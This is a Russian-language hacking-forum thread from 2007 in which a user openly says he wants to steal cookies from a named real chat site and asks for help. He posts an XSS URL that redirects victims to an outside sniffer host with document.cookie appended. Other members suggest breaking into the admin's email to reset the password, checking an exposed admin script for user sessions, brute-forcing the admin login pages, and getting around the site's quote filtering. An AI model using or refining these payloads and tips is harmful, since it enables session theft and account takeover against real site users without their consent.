Чаты Хочу украсть куки с чата onego. Что я делаю не так?

Discussion in 'Веб-уязвимости' started by Illidan, 29 Jan 2007.

  1. Illidan

    Illidan New Member

    Joined:
    24 Jan 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, я хочу украсть куки с чата (http://home.onego.ru/~smokie_chat/chat/), разобрался я вроде бы с XSS, со снифферами, нашёл на сайт ачата какой XSS используется в voodoo (?url=javascript:alert(/Tested%20by%20qBiN/);)
    Сниффер использую http://xtoolz.hut1.ru/cgi-bin/x/xsave.gif
    В итоге получилось у меня вот такая вещь http://home.onego.ru/~smokie_chat/chat/?url=javascript:document.location="http://xtoolz.hut1.ru/cgi-bin/x/xsave.gif"+document.cookie;
    Но куки всё равно в логах не выдаёт((((
    Что же я делаю не так?! И может ли это быть связано с тем, что сервер находится на провайдере onego.ru?
    Или может я ошибку допускаю? :confused:
     
  2. goodkit

    goodkit Member

    Joined:
    19 May 2006
    Messages:
    160
    Likes Received:
    30
    Reputations:
    2
    А чё ето за чат-то?? ) Лучше бы подумал как chat.karelia.info паламадь!
     
  3. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Ты где там xss то вообще нашёл ? ;) =)
     
  4. Illidan

    Illidan New Member

    Joined:
    24 Jan 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    http://home.onego.ru/~smokie_chat/chat/go.php?url=javascript:alert()
    Д-к вот он...алерт выскакивает, как и должно быть в XSS...или я не прав?
     
  5. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    у тебя наврят ли что-нить получится с xss.
    ломай мыло админа и восстановливай пароль.
     
  6. Illidan

    Illidan New Member

    Joined:
    24 Jan 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ок, но обьясните чё не так-то? Ведь в это статье написано мол в вудувских чатах это XSS http://forum.antichat.ru/thread20985.html
     
  7. KREST

    KREST Banned

    Joined:
    24 Jan 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Проги найди и инфу про взломы почитай(Фак),мож с хss че и получиться....
     
    1 person likes this.
  8. Illidan

    Illidan New Member

    Joined:
    24 Jan 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Д-к перечитал уже много чего (и не только на ачате), теории в голове много, а вот на практике жопа какая-то выходит((( Мож видео есть у кого по взлому вуду, или ссылки?
     
  9. n3r0bi0m4n

    n3r0bi0m4n New Member

    Joined:
    21 Aug 2005
    Messages:
    24
    Likes Received:
    2
    Reputations:
    2
    VooDoo Engine, дабы такие "хитрые" личности как ты не 3,14здили куки делает вот что:

    тыкая на каждую ссылку где-нибудь внутри чата, она загружается в переменную "url" скрипта go.php ИЗ КОТОРОГО уже перемещает на нужную страницу. Собственно ничего сильно интересного не передается :)

    у мну вышли только: дизайн, имя юзера и еще какая-то чушь ... но я не особо старался, так что... пробуй и может получится что-нибудь...

    кстати, если чат на демоне - лезь в /cgi-bin/daemon_admin.pl (если его не переименовали)

    там все сесси пользователей (втч и админов) но ничего сверхполезного это ТОЖЕ не даст.

    тебе как минимум нужен пасс от site/chat/admin/

    вооо-оот там уже можно что-нибудь накосячить...
    пиши брут для admin/index.php || admin/configure.php

    зы: сырцы на vochat.com
     
    1 person likes this.
  10. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    в ентом go.php вырезается такая выжная хрень как %22
    без нее даже алерт не выскочит, т.к. все останется в теге